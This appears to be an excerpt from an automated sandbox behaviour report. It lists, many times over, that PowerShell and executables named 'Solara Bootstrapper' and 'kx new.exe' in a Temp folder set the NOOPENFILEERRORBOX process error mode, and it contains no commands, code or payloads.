Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
